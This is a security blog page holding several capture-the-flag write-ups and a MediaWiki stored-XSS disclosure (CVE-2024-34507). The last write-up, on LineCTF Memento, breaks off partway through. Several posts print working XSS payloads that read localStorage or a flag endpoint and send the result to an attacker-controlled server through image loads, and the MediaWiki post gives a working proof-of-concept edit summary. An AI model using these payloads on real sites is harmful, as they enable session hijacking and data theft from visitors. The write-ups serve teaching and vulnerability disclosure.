Showing posts with label write-up. Show all posts
Showing posts with label write-up. Show all posts

Tuesday, September 3, 2024

SekaiCTF 2024 - htmlsandbox

 Last weekend I competed in SekaiCTF. I spent most of the competition focusing on one problem - htmlsandbox. This was quite a challenge. It was the least solved web problem with only 4 solves. However I'm quite happy to say that I got it in the end, just a few hours before the competition ended.

The problem 

We are given a website that lets you post near arbitrary HTML. The only restriction is that the following JS functions must evaluate to true:

  • document.querySelector('head').firstElementChild.outerHTML === `<meta http-equiv="Content-Security-Policy" content="default-src 'none'">`
  • document.querySelector('script, noscript, frame, iframe, object, embed') === null
  • And there was a check for a bunch of "on" event attributes. Notably they forgot to include onfocusin in the check, but you don't actually need it for the challenge
     

 This is all evaluated at save time by converting the html to a data: url, passing it to pupeteer chromium with javascript and external requests disabled. If it passes this validation, the html document goes on the web server.

There is also a report bot that you can tell to visit a page of your choosing. Unlike the validation bot, this is a normal chrome instance with javascript enabled. It will also browse over the network instead of from a data: url, which may seem inconsequential but will have implications later. This bot has a "flag" item in its LocalStorage. The goal of the task is to extract this flag value.

The first (CSP) check is really the bulk of the challenge. The other javascript checks can easily be bypassed by either using the forgotten onfocusin event handler or by using <template shadowrootmode="closed"><script>....</script></template> which hides the script tag from document.querySelector().

CSP meta tag

Placing <meta http-equiv="Content-Security-Policy" content="default-src 'none'"> in the <head> of a document disables all scripts in the page (as script-src inherits from default-src)

Normally CSP is specified in an HTTP header. Putting it inside the html document does come with some caveats:

  • It must be in the <head>. If its in the <body> it is ignored.
  • It does not apply to <script> tags (or anything else) in the document present prior to the <meta> tag

So my first initial thought was that maybe we could somehow get a <script> tag in before the meta tag. The challenge checks that the meta tag is the first element of <head>, but maybe we could put the <script> before the <head> element.

 Turns out, the answer is no. Per the HTML5 spec. If you add some content before the head, it acts like you implicitly closed the <head> tag and started the body tag. No matter how you structure your document, the web browser fixes it up to be reasonable. You cannot put anything other then a comment (and DTDs/PIs) before the <head>.

I also thought about DOM cloberring, but it seemed pretty impossible given that document.querySelector() and === was used.

The other wrong turn I tried was redirecting the document. You can put a <meta http-equiv="refresh" content="0;url=http://example.com"> tag in a document to redirect the page somewhere else. My thought was that if i redirect the page really quickly, maybe the checks would happen on a page I control.

The problem here is that network requests were disabled in puppeteer so I can't just redirect to some site I control. Chrome also disables meta redirection to data: urls (I guess they were a common phishing vector or something) so they are out. I can't use blob: urls as I have no javascript to create a blob url.

Similarly, if instead I try to delay the redirect until after validation has finished, I still have nowhere to redirect too, as I need some page with an XSS on the same origin in order to read the localStorage. Thus client side redirection was out.

Lots of dead ends here.

The hint

Since initially no team had solved the problem for quite a while, the organizers provided a hint.

You may want to look for a parsing differential in streamed and non-streamed HTML parsing.

Alright, off to the HTML5 spec.

Its a big spec, but it seemed like section 13.2 would be the relevant part. After reading that part several times, the following seemed like the only thing the hint could possibly be referring to:

Section 13.2.3.2 Determining the character encoding:

The user agent may wait for more bytes of the resource to be available, either in this step or at any later step in this algorithm. For instance, a user agent might wait 500ms or 1024 bytes, whichever came first. In general preparsing the source to find the encoding improves performance, as it reduces the need to throw away the data structures used when parsing upon finding the encoding information. However, if the user agent delays too long to obtain data to determine the encoding, then the cost of the delay could outweigh any performance improvements from the preparse.

So during the algorithm for determining a character encoding (charset), browsers can choose to only apply it to the first part of the document if all the bytes of the document are not yet available.

More concretely, this means that for a data: url, the character encoding algorithm applies to the whole document as the document is available immediately. For a network load, it does not.

In our challenge, the validation bot loads from a data: url. The report bot loads from network. This seems like something we can exploit.

Charset confusion

I've heard of character set confusion before, but usually in the context of different systems supporting different character sets. For example, where the validator supports UTF-7 which has a non-ascii compatible encoding of <, but web browsers do not support it and interpret the document with an unknown charset as UTF-8.

However this is a bit different, since the web browser and ultimate viewer are the same program - both a web browser, both supporting the exact same charsets.

We need to find two character encodings that interpret the same document different ways - one with the CSP policy and one without, and have both character encodings be supported by modern web browsers.

What character sets can we even possibly specify? First off we can discard any encodings that always encode <, > and " the way ascii would which include all single-byte legacy encodings. Browsers have intentionally removed support for such encodings due to the problems caused by encodings like UTF-7 and HZ. Per the encoding standard, the only ones left are the following legacy multi-byte encodings: big5, EUC-JP, ISO-2022-JP, Shift_JIS, EUR-KR, UTF-16BE, UTF-16LE.

Looking through their definitions in the encoding standard, ISO-2022-JP stands out because it is stateful. In the other encodings, a specific byte might affect the interpretation of the next few bytes, but with ISO-2022-JP, a series of bytes can affect the meaning of the entire rest of the text.

ISO-2022-JP is not really a single encoding, but 3 encodings that can be switched between each other with a special code. When in ascii mode, the encoding looks like normal ascii. But when in "katakana" mode, the same bytes get interpreted as Japanese characters.

This seems ideal for the purposes of creating a polygot document, as we can switch on and off the modes to change the meaning of a wide swath of text.

An Example

Note: throughout this post i will be using ^[ to refer to the ASCII escape character (0x1B). If you want to try these out as data: urls, replace the ^[ with %1B

Consider the following HTML snippet:

<html><head><!-- ^[$BNq --><script>alert('here');</script><!-- ^[(B--></head></html>

When using a normal encoding like windows-1252 (aka ISO-8859-1) or UTF-8, the document looks just like you see above, just with the ^[ replaced with an unprintable character.

When viewed under the ISO-2022-JP encoding, it looks like:

<html><head><!-- 暦�⑬昭黹鱸頸鍾跂鶯├蒹鱚З纂�竰蜷�次⑬�--></head></html>

The ^[$BNq sequence changes the charset mode to katakana, ^[(B changes it back to ASCII. Under windows-1252 these escape sequences are ignored, of course. Thus we have made a polygot document that will give an alert box only in windows-1252 mode.

If you want to try yourself:

data:text/html;charset=windows-1252,%3Chtml%3E%3Chead%3E%3C!--%20%1B$BNq%20--%3E%3Cscript%3Ealert('here');%3C/script%3E%3C!--%20%1B(B--%3E%3C/head%3E%3C/html%3E

vs

data:text/html;charset=iso-2022-jp,%3Chtml%3E%3Chead%3E%3C!--%20%1B$BNq%20--%3E%3Cscript%3Ealert('here');%3C/script%3E%3C!--%20%1B(B--%3E%3C/head%3E%3C/html%3E

 Note how the body of the url is exactly the same. The only thing that is different is the charset specified in the mime type of the url, which totally changes the interpretation.

Exploiting the detection algorithm

We now have the ability to make HTML that is very different depending on charset, but how do we make sure it is interpreted with different charsets in different contexts?

If we recall from the problem description - the validator loads the page via a data: url, which loads the full page instantly. The victim loads the page over the network.

In the network case, chrome will start parsing immediately and guess the charset before the entire document.

So in theory all we need to do is make the document really long, have the part at the beginning be evil under one charset, add a charset declaration at the end for the other charset which makes the document look good. Browsers loading it all at once will see it as benign, browsers loading it over the network will see it as evil. This might look something like:

<html>
	<head>
    	<!-- é - Add a windows-1252 character to make sure early heurstics detect as windows-1252 -->
        <!-- ^[$BNq From this part onwards it is visible only in windows-1252 mode -->
        <script> doSomeEvilStuff();x = new Image(); x.src='https://mywebhook?' + encodeURIComponent(localStorage['flag']); </script>
        <!-- Bunch of junk. Repeat this 3000 times to split amongst multiple packets -->
        <!-- ^[(B After this point, visible in both modes -->
        <meta http-equiv="Content-Security-Policy" content="default-src 'none'">
        <meta charset="iso-2022-jp">
    </head>
<body></body></html>

This should be processed the following way:

  • As a data: url - The browser sees the <meta charset="iso-2022-jp"> tag, processes the whole document in that charset. That means that the <script> tag is interpreted as an html comment in japanese, so is ignored
  • Over the network - The browser gets the first few packets. The <meta charset=..> tag has not arrived yet, so it uses a heuristic to try and determine the character encoding. It sees the é in windows-1252 encoding (We can use the same logic for UTF-8, but it seems the challenge transcodes things to windows-1252 as an artifact of naively using atob() function), and makes a guess that the encoding of the document is windows-1252. Later on it sees the <meta> tag, but it is too late at this point as part of the document is already parsed (note: It appears that chrome deviates from the HTML5 spec here. The HTML5 spec says if a late <meta> tag is encountered, the document should be thrown out and reparsed provided that is possible without re-requesting from the network. Chrome seems to just switch charset at the point of getting the meta tag and continue on parsing). The end result is the first part of the document is interpreted as windows-1252, allowing the <script> tag to be executed.

So I tried this locally.

It did not work.

It took me quite a while to figure out why. Turns out chrome will wait a certain amount of time before preceding with parsing a partial response. The HTML5 spec suggests this should be at least 1024 bytes or 500ms (Whichever is longer), but it is unclear what chrome actually does. Testing this on localhost of course makes the network much more efficient. The MTU of the loopback interface is 64kb, so each packet is much bigger. Everything also happens much faster, so the timeout is much less likely to be reached.

Thus i did another test, where i used a php script, but put <?php flush();sleep(1); ?> in the middle, to force a delay. This worked much better in my testing. Equivalently I probably could have just tested on the remote version of the challenge.

After several hours of trying to debug, I had thus realized I had solved the problem several hours ago :(. In any case the previous snippet worked when run on the remote.

Conclusion

 This was a really fun challenge. It had me reading the HTML5 spec with a fine tooth comb, as well as making many experiments to verify behaviour - the mark of an amazing web chall.

I do find it fascinating that the HTML5 spec says:

Warning: The decoder algorithms describe how to handle invalid input; for security reasons, it is imperative that those rules be followed precisely. Differences in how invalid byte sequences are handled can result in, amongst other problems, script injection vulnerabilities ("XSS").

 

 And yet, Chrome had significant deviations from the spec. For example, <meta> tags (after pre-scan) are supposed to be ignored in <noscript> tags when scripting is enabled, and yet they weren't. <meta> tags are supposed to be taken into account inside <script> tags during pre-scan, and yet they weren't. According to the spec, if a late <meta> tag is encountered, browsers are supposed to either reparse the entire document or ignore it, but according to other contestants chrome does neither and instead switches midstream.

Thanks to project Sekai for hosting a great CTF.

Saturday, March 30, 2024

MediaWiki edit summary XSS write-up

 Back in January, I discovered a stored XSS vulnerability in core MediaWiki (T355538; CVE-2024-34507). Essentially by setting a specific edit summary when editing a page, you could run javascript (And take over the account of anyone viewing the edit summary, for example on the history page or recentchanges)

MediaWiki core is generally pretty good when it comes to security. There are many sketchy extensions, and sometimes there are issues where an admin might be able to run javascript, but by and large unauthenticated XSS vulns are fairly rare. I think the last one was CVE-2021-44858 from back in 2021. The next one before that was CVE-2017-8815 in 2017, which only applied to wikis configured to have a site language of certain languages (e.g. Serbian and Chinese). At least, those were the ones I found when looking through the list. Hopefully I didn't miss any. In any case, finding XSS triggerable by an unprivleged attacker in MediaWiki core is pretty hard.

So what is the bug? The proof of concept looks like this - Create an edit with the following edit summary:

[[Special:RecentChanges#%1b0000000|link1]] [[PageThatExists#/autofocus/onfocus=alert("xss\n"+document.domain)//|link2]]

This feels a bit random at first glance. How does it work?

The edit summary parser

Whenever you edit a page on MediaWiki, there is a box for your edit summary. This is essentially MediaWiki's version of a commit message.

Very little formatting is allowed in this summary. A major exception is links. You can link to other pages by enclosing the link in [[ and ]].

So this explains a little bit about the proof-of-concept - it involves 2 links. But why 2? It doesn't work with just 1. What is with the weird link targets? They are clearly abnormal, but they also don't look like typical XSS. There are no < or >, there aren't even any unclosed quotes.

Lets take a deeper look at how MediaWiki applies formatting to these edit summaries. The code where all this happens is includes/CommentFormatter/CommentParser.php.

The first thing we might notice is the following line in CommentParser::preprocessInternal: "// \x1b needs to be stripped because it is used for link markers"

In the proof of concept, the first part is [[Special:RecentChanges#%1b0000000|link1]], where %1b appears. This is a good hint that it has something to do with link markers, whatever those are.

Link markers

But what are link markers?

When MediaWiki makes a link, it needs to know whether the page being linked to exists or not, since missing pages use a red colour. The most natural way of doing this is, when encountering a link, to check in the DB whether or not the page exists.

However, there is a problem. When rendering a long page with a lot of links, we have to do a lot of DB lookups. The lookups are simple, but still on a separate (albeit nearby server). Each page to lookup involves a local network request to fetch the page status. While that is happening, MW just sits and waits. This is all very fast, but even still it adds up a little bit if you have say 500 links on a page.

The solution to this problem was to batch the queries. Instead of immediately looking up the page, MW would put a small link marker in the page at that point and carry on. Once it is finished, it would look up all the links all at once, and then do another pass to replace all the link markers.

So this is what a link marker is, just a little marker to tell MW to come back to this spot later after it figured out if all the links exist. The format of this marker is \x1B<number> (So \x1B0000000 for the first one, \x1B0000001 for the second, and so on). \x1B is the ASCII escape character.

Back to the PoC

This explains the first part of the proof of concept: [[Special:RecentChanges#%1b0000000|link1]] - the link target is a link marker. The code has a line:

                                // Fix up urlencoded title texts (copied from Parser::replaceInternalLinks)
                                if ( strpos( $match[1], '%' ) !== false ) {
                                        $match[1] = strtr(
                                                rawurldecode( $match[1] ),
                                                [ '<' => '&lt;', '>' => '&gt;' ]
                                        );
                                }


Which normalizes titles using percent encoding to use the real characters. Thus the %1B gets replaced with an actual 0x1B byte sequence. The code did try and strip 0x1B characters earlier, but at that point, it was still just %1b and did not match the check.

We now have a link with a link marker inside of it. An important note here is that Special:RecentChanges is not a normal page. It is a special page. MediaWiki knows it exists without having to consult the database, so it does not get the link marker treatment. This is important because we cannot use it as a fake link marker if it gets replaced by a real link marker.

At this stage after inserting link markers, the proof of concept becomes the following string:

<a href="/w/index.php/Special:RecentChanges#\x1B000000" title="Special:RecentChanges">link1</a> \x1B0000000

A link with a link marker inside it!

The second link

The \x1B0000000 is a stand in for [[PageThatExists#/autofocus/onfocus=alert("xss\n"+document.domain)//|link2]].

The replacement at the end is a normal replacement, and everything is fine. However there are now two replacements - there is also the replacement inside the link: href="/w/index.php/Special:RecentChanges#\x1B000000"

This is the fake link marker that we contrived to get inserted. Unlike the normal link markers, this is inside an attribute. The replacement text assumes it is being inserted as normal HTML, not as an attribute. Since it is a full link that also has quotes inside it, the two layers of quotes will interfere with each other.

Once the replacements happen we get the following mangled HTML for our proof of concept:

<a href="/w/index.php/Special:RecentChanges#<a href="/w/index.php/Test#/autofocus/onfocus=alert(&quot;xss\n&quot;+document.domain)//" title="Test">link2</a>" title="Special:RecentChanges">link1</a> <a href="/w/index.php/Test#/autofocus/onfocus=alert(&quot;xss\n&quot;+document.domain)//" title="Test">link2</a>

This obviously looks wrong, but its a bit unclear how browsers interpret it. A little known fact about HTML - /'s can separate attributes so long as no equal signs have been encountered yet. After the browser hits the second " mark, it thinks the href attribute is closed and that the remaing is some additional attributes. The browser essentially parses the above html as if it was:

<a href="/w/index.php/Special:RecentChanges#<a href=" w="" index.php="" Test#="" autofocus onfocus="alert(&quot;xss\n&quot;+document.domain)//&quot;" title="Test">link2</a>" title="Special:RecentChanges"&gt;link1</a> <a href="/w/index.php/Test#/autofocus/onfocus=alert(&quot;xss\n&quot;+document.domain)//" title="Test">link2</a>

In other words, an <a> tag, that has an attribute named autofocus and an onfocus event handler. On page load, the link is automatically focused, which triggers the javascript in the onfocus attribute to run, allowing the attacker to do what they want.

Take aways

I think the major take aways is that running Regexes over partially parsed HTML is always scary. We've had similar issues in the past, for example T110143.

The general pattern we've used to fix this and similar issues, is make sure the replacement token has special characters that would be mangled if it appeared in an unexpected context. Concretely, we added " and ' to the token, which would get escaped if placed in an attribute, and thus no longer matching and no longer being replaced.

More generally though, I think this is a good example of why even a minimal CSP policy would be helpful.

CSP is a complex standard, that can do a lot of things and has a lot of pieces. One of the things it can do, is disable "unsafe-inline" javascript. This means javascript from attributes (like onfocus) and javascript URLs. Usually this also includes inline <script> tags without a nonce, but that part is optional. A key point here, is this also generally means you cannot execute javascript via .innerHTML anymore, which is a fairly common vector for XSS via javascript.

Normally disabling unsafe-inline would be part of a broader effort to secure javascript, however its possible to take things a step at a time. This vulnerability would have been stopped just by disabling event attributes. A surprising portion of MediaWiki & extension XSS vulns [Excluding boring - an admin can change something in an unsafe way issues] involve just html attributes (or javascript: urls), which is a web feature that nobody really needs for legit reasons and is generally considered bad practise in normal usage. Even the most minimal CSP policy might really help MediaWiki's overall security posture against XSS vulns.

For more info about the vulnerability, please see the original report at https://phabricator.wikimedia.org/T355538.

Wednesday, February 21, 2024

LA CTF write up: ctf-wiki

Last weekend I participated in LA CTF 2024. This is how I solved one of the challenges: "ctf-wiki". It was solved by 38 teams and worth 483 points.

The challenge

The challenge was an XSS problem. You can view it at the LACTF github. We are given a website that you can log into. Once you log in, you can create and edit pages, including adding arbitrary HTML (The description parameter is output unescaped). There is also a /flag page which outputs a flag if you are logged in as the admin. Finally, there is an admin bot that you can give a URL to, which it will visit, while being logged in as the admin. There is a CSP policy, but it specifies img-src * which allows us to exfiltrate data in the file names of images we chose to load.

This is all a pretty standard setup for a CTF XSS challenge.

Normally you would solve a problem like this by injecting a script like this into one of the pages of the site:

<script>
fetch(
  'https://ctf-wiki.chall.lac.tf/flag',
  {method:'post'}
).then( t=>t.text() ).then( a => {
  b=new Image();
  b.src='https://MYWEBSERVERHERE/?flag='+encodeURI( a.substr( 0,50 ) );
} );
</script>

And convince the admin bot to visit the page this script has been injected into. Admin bot visits the page, executes script, loads the /flag endpoint, loads an image from my webserver with the flag in the URL (CSP was blocking cross-site fetch() but not cross-site image loads, so we exfiltrate using an image). I then check my apache access_log file, find the flag, easy-peasy.

However there is a catch.

The Twist

As I said before, there is a twist. You can only view pages on the site if logged out. Logged in users can edit pages but not view them
 
The admin bot is logged into the site as the admin (so it can read /flag). If we send the admin bot to the page with the injected script, it just sees the edit page. It does not execute the script.

We can work around this a few ways. Since SameSite=Lax cookies are being used, we could load the site in an <iframe> from a different domain. SameSite=Lax is a security measure that means cookies are only loaded on top-level GET navigations, but not when a website is loaded as a subresource from a different "site". Another way to force being logged out is to simply add a period to the end of the domain - e.g. http://ctf-wiki.chall.lac.tf./ . An obscure feature of DNS is that it can be configured to automatically add "search domains" at the end of a domain name. Adding a period to the end of the domain name turns off this rarely used feature. The end result is that ctf-wiki.chall.lac.tf. and ctf-wiki.chall.lac.tf are separate domain names that point to the same place. Web browsers consider them to be totally separate websites which have separate cookies.

Thus I can point the admin bot to http://ctf-wiki.chall.lac.tf. (Plain http not https since the certificate won't match), and it will execute the script I insert into the site. Unfortunately there is another problem. The admin bot won't be logged in when fetching http://ctf-wiki.chall.lac.tf./flag, and thus it cannot read the contents of http://ctf-wiki.chall.lac.tf/flag since that would be a cross-domain request, which is prevented by the same origin policy.

This is quite a catch-22. We can either be logged in, able to read the flag but not able to tell the browser to get it, or we can be logged out, be able to tell the browser to fetch but not be able to access the results. We need to be both logged in and logged out at the same time

Popup windows

The natural solution to this problem would be a pop-up window. You could open the page with an injected script in an <iframe>. SameSite=Lax cookies are not sent to cross-site iframes, so we would be logged out in the <iframe> and execute the script. The script could use window.open() to open a pop-up window. Pop-up windows are a top-level GET navigation, so SameSite=Lax cookies will be sent, and we will be logged-in inside the pop-up. Since both the iframe and the pop-up are the same domain, they are allowed to communicate with each other; window.open() returns a window object for the pop-up, which the iframe can use to run scripts in the context of the pop-up window.

There is only one problem - pop-up blockers. Modern browsers only allow pop-up windows if they are the result of a user action. Users have to click something. Scripts cannot create pop-up windows of their own volition.

It turns out that this is not entirely true for the contest.The admin bot had its pop-up blocker disabled, so I could have used pop up windows. However, at the time I simply tested with my local copy of chrome, saw it didn't work, and assumed the adminbot would be the same. An important lesson here: you should always test your assumptions. Nonetheless, lets pretend that wasn't the case, can we solve this problem without using pop-ups?

The challenge on hard mode: no pop-ups

Without pop-ups, we essentially only have <iframe>s and navigating the entire page. There are two browser features that present a challenge here:

  • SameSite=Lax cookies: This is designed so that no cookies are ever sent from requests originating cross-site except for top level GET navigations.
  • Cache partitioning - Browsers are becoming more and more concerned with user tracking. To combat this they have implemented cache partitioning. Essentially, caches are partitioned so that an <iframe> of some domain has a totally separate cache from a top level navigation to that domain. This includes APIs like ServiceWorkers that you might be able to use to control other pages on the same domain. It also includes cookies. The exact details of this varies between browsers.
This was looking pretty hopeless, after all the entire point of cache partitioning was to prevent communication between third-party iframes and their main site. I didn't just want to communicate from a third-party iframe to its originating site, I wanted to control the originating site from the third-party website, which seems much harder then mere communication. If there was a way to communicate, it would break the entire point of the cache partitioning feature.
 
After much googling, I eventually came across the google chrome privacy sandbox docs. It had the following enticing line:

A blob is an object that contains raw data to be processed, and a blob URL can be generated to access the resource. Blob URL stores are not partitioned. To support a use case for navigating in a top-level context to any blob URL (discussion), the blob URL store might be partitioned by the agent cluster instead of the top-level site. This feature is not be available for testing yet, and the partitioning mechanism may change in the future.

 

An exception to cache partioning! That sounds exactly like what I needed.

What is a blob url anyways?

A blob url is kind of like a fancy data: url. They are generally of the form blob:origin/UUID. For example: blob:http://example.com/1c18cbfc-cb5a-4709-9fd4-f50bb96ab7b7. They reference some bytes associated with a specific page, and generally only last so long as the page they are associated with exists. You can use them like data: urls, for example in the src attribute of an <img> tag. Unlike data urls, blob urls don't embed the data within themselves but just reference it with a UUID, which can be helpful for large files. Normally you create them with the URL.createObjectURL() javascript API, which takes a Blob object and outputs a blob url.

The exciting part is:
  • Unlike data: urls, Blob urls have the same origin as the page that creates them.
  • Blob urls are exempt (for the moment at least) from cache partioning and work across third-party contexts.
  • You can use blob urls to do top-level navigation. (data: urls have been banned from script based top level navigation)

Putting this altogether, we can create a blob url from inside an iframe containing HTML of our choosing, navigate the entire page to the blob url with our HTML, which then executes as if it was top level. This means that it can send SameSite cookies as well as being considered in the same cache partition as the main site (unlike the <iframe>). Hence we are logged in, inside this blob: url.

Putting it all together

To pull this off, we'll have two pages on the ctf-wiki, the actual script and an iframe wrapper.

The iframe wrapper simply looks like this. We would visit it from the extra dot url to be logged out:

 <iframe src="https://ctf-wiki.chall.lac.tf/view/4568f3f843562569a487b3ee9fb22dcf"></iframe>

The page it wraps is the interesting one:

<script>
 parent.location = URL.createObjectURL(
    new Blob( [
      "<script>" +
      "fetch('https://ctf-wiki.chall.lac.tf/flag',{method:'post'})" +
        ".then(t=>t.text())" +
        ".then(flag => { " +
            "var img = new Image();" +
            "img.src = 'https://MYWEBSITEHERE/?flag='+encodeURI(flag.substr(0,50))" + 
         "});" +
       "\x3C/script\x3E"
    ], 
    {type: "text/html"}
    )
 )
</script>

This script creates a blob url. The blob url contains an HTML page with a script that fetches the flag and exfiltrates it to my server. It then navigates the parent window (i.e. Not the <iframe> we are inside, but the page containing it) to this blob url. The blob url will then execute in a top level context with the same origin as the <iframe>. It will fetch the flag, and then send that value to my server as an image load request.

So I tried it. It didn't work :(

Looking at the browser console, I had an error saying iframes are not allowed to navigate the top window without the user clicking on something. At first, i thought the approach was dead, but then I remembered that the sandbox attribute for <iframe>s had something related to this.

Normally the sandbox attribute just takes away rights relative to being unspecified; it doesn't add any rights. However, the docs mentioned both a allow-top-navigation and a allow-top-navigation-by-user-activation sandbox keyword. The later being the behaviour I seemed to be getting with no sandbox attribute and the former being the behaviour I wanted. It didn't seem like there would be much point in including allow-top-navigation, if it was never allowed, so I thought I would try it and see what happened. I changed my iframe to be
 
<iframe src="https://ctf-wiki.chall.lac.tf/view/4568f3f843562569a487b3ee9fb22dcf" sandbox="allow-top-navigation allow-scripts allow-same-origin"></iframe>

Then I visited the page with that iframe: http://ctf-wiki.chall.lac.tf./view/ea313ff4550b824368d39e00936ef58d (Note the dot after the tf TLD, to ensure no cookies are sent so we are logged out. We need this page to be on the weird domain in order to prevent cookies to show our XSS. We need the iframe to frame the real domain. It also won't send cookies since it is a cross-domain iframe, but it needs to be the real domain since the blob inherits its origin and we want the blob to be the real domain).

And it worked!

The page with the iframe loaded the second page inside the iframe. That page was cookie-less, but created the blob url with the second stage script. It navigated the top window to the blob script, which was now running at the top level, so all the fetch() requests it makes have the appropriate cookies. It fetched the flag, and then sends the flag to my website as part of the name of a fake "image" file. I can then see the flag in my apache access log.
 
107.178.207.72 - - [18/Feb/2024:04:43:45 +0000] "GET /?flag=lactf%7Bk4NT_k33P_4lL_my_F4v0r1T3_ctF3RS_S4m3_S1t3%7D HTTP/1.1" 200 3754 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/121.0.0.0 Safari/537.36"
 
Thus the flag is: lactf{k4NT_k33P_4lL_my_F4v0r1T3_ctF3RS_S4m3_S1t3}
 

Conclusion

It is indeed possible to pivot from an XSS in an iframe, to an XSS that can read data that is partitioned to the main site, without using a pop-up. Of course the situation of having an XSS when not logged in but no XSS when actually logged in is pretty contrived. I do wonder if there are situations in the real world where using blobs to bypass SameSite cookies is applicable. I find it hard to imagine - an XSS attack is usually powerful enough to make things game over. It would be unusual that you couldn't leverage that directly.
 
The most realistic scenario i could think of where this blob behaviour might be useful, would be to bypass break out of credentialless iframes. Credentialless iframes are used for cross-origin isolated contexts (When you want your website to not be in the same process site of any other website, in order to prevent speculative exectution type attacks) and are not allowed to have references to window objects of pop-ups. Thus the usual attacks with pop-ups cannot be done. However the blob: url method can still work to turn an XSS in a credentialess context to one that can make credentialed requests.

Anyways. It is quite weird that blobs are exempt from cache partitioning. I wonder how long that will last.



Wednesday, March 29, 2023

CTF Writeup: Memento from LineCTF 2023

 Over the weekend I participated in LineCTF 2023. This was a really fun CTF with lots of great web challenges. Often web challenges in CTFs are either really contrived, really guessy or really easy. It was nice to see a CTF with a large number of high quality web challenges that were challenging while still feeling realistic and not guess based.

Overall I didn't get too many challenges during the competition. However I did solve one challenge that nobody else did: Memento. It was the only web challenge to have only one solve, and I honestly feel pretty proud of myself for getting it. Not to mention that it makes me feel a lot better about having no idea how to solve most of the other problems :). In the end I came 28th with 601 points.

The challenge

We are given a Java Spring application that allows you to store notes and view the list of notes you have previously stored. The notes themselves are not access controlled, but are stored under an unguessable UUID. There is an admin bot which you can ask to look at a url. If you do, it will store a note containing the flag and then look at the url of your choosing.

To trigger this bot action there is a a /bin/report endpoint:

    @RequestMapping("/report")
    public String report(@RequestParam String urlString) throws Exception {
        URL url = new URL(urlString);
        HttpClient.newHttpClient().send(HttpRequest.newBuilder(new URI("http://memento-admin:3000/?url=" + url.getPath())).build(), HttpResponse.BodyHandlers.ofString()).body();
        return "redirect:/" + url.getPath() + "#reported";
    }

 

Which then triggers a node.js app that runs headless chromium:

            // post flag as anonymous user
            console.log(origin + "/bin/create");
            await page.goto(origin + "/bin/create");
            await page.type("textarea", FLAG);
            await page.click("button");

            // visit to reported url
            await page.goto(origin + url);

 

The other important endpoints is the list and create endpoints:

    @GetMapping("/list")
    public String binList(Model model) {
        if (authContext.userid.get() == null) return "redirect:/";
        model.addAttribute("bins", userToBins.get(authContext.userid.get()));
        return "list";
    }


    @PostMapping("/create")
    public String create(@RequestParam String bin) {
        String id = UUID.randomUUID().toString();
        if (userToBins.get(authContext.userid.get()) == null) {
            userToBins.put(authContext.userid.get(), new ArrayList<String>());
        }
        userToBins.get(authContext.userid.get()).add(id);
        idToBin.put(id, bin);
        return "redirect:/bin/" + id;
    }

 

Not an XSS

At first glance, i assumed this was going to be some sort of XSS. Typically when you see a bot process that does something with confidential data then goes to a url of your choosing it is some sort of client side vulnerability. However, i looked, and there was clearly no opportunity for XSS or more obscure client-side data leaks.

If not XSS, then where to next? If its not client side, we must need to get the secret note directly somehow. Guessing the UUID seemed impossible, so that left the /list endpoint. Clearly we needed some way to see the list of the admin bot's notes. With that in mind, maybe there is something about session generation that would allow us to steal their session. Here is the session auth code:

public class AuthInterceptor implements HandlerInterceptor {

    @Autowired
    private AuthContext authContext;

    private static String COOKIE_NAME = "MEMENTO_TOKEN";

    @Override
    public boolean preHandle(HttpServletRequest request, HttpServletResponse response, Object handler) throws Exception {
        Cookie cookie = WebUtils.getCookie(request, COOKIE_NAME);
        if (cookie != null && !cookie.getValue().isEmpty()) {
            try {
                String token = cookie.getValue();
                String userid = JwtUtil.verify(token);
                authContext.userid.set(userid);
                return true;
            } catch (Exception e) {
                // Failed to verify jwt
            }
        }
        String userId = UUID.randomUUID().toString();
        cookie = new Cookie(COOKIE_NAME, JwtUtil.sign(userId));
        cookie.setPath("/");
        response.addCookie(cookie);
        return true;
    }

    @Override
    public void postHandle(HttpServletRequest request, HttpServletResponse response, Object handler, ModelAndView modelAndView) throws Exception {
        authContext.userid.remove();
    }
}

public class AuthContext {
    public ThreadLocal<String> userid = new ThreadLocal<String>();
}

Alright, so the app checks if the user has a cookie. If not, gives them a new JWT cookie with a session id. The current user's id is stored in thread local storage at the beginning of the request, and cleared at the end of the request.

First thing I tried was the usual JWT vulns, setting alg = NonE, etc but to no avail.

However, one thing did stand out in this code - the postHandle. The current user id is essentially being stored in a (thread specific) global variable. I'm not that familiar with Java, but given that it is explicitly being cleared towards the end of the request, one assumes that that is neccessary and otherwise the thread local storage would persist across HTTP requests.

Attacking session lifetime

Thus an (incorrect) plan started to form based on a session fixation attack:

  • Somehow cause postHandle() not to be run at the end of the request
  • Send a request to fix the session to one of my choosing
  • Have the admin bot go post something under my chosen session
  • View the /bin/list endpoint with my chosen session cookie, thus getting the id of the flag note
  • Fetch the flag

I'll get to the incorrect assumption I made here in a little bit. First things first, how do we make postHandle() not run?

We need some way to change the control flow of the process to bypass the postHandle. A good way to alter the control flow of a program is to throw an exception. Luckily for us, java requires methods to annotate if they throw exceptions so its really easy to see possible triggers. As we can see from the code, the report endpoint can throw an exception. A quick look at the Java docs shows that the URI constructor can throw a "URISyntaxException - If the given string violates RFC 2396, as augmented by the above deviations".

This all sounds very promising. After all, we control the URL that we are reporting. Some quick experiments later, and it seems like having a url with %7F in it triggers a 500 error. This looks really promising.

So lets test this theory. Can we retrieve the bin list without specifying the cookie?

curl 'http://172.17.0.1:10000/bin/create' --data 'bin=MyTest' -i -H 'Cookie: MEMENTO_TOKEN=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiI4ZDA3NDY5ZC1jMmM5LTRkNzItYWMyYS0xZjRkMTA4YmFjMDAifQ.MtOeLRzaBI_y97M_Pr0eQ56bZwVia2tMGpUspj_NEGg' | grep Location

Location: http://172.17.0.1:10000/bin/bcab05e5-2fb6-4b8c-aed5-1a18c5fde4be

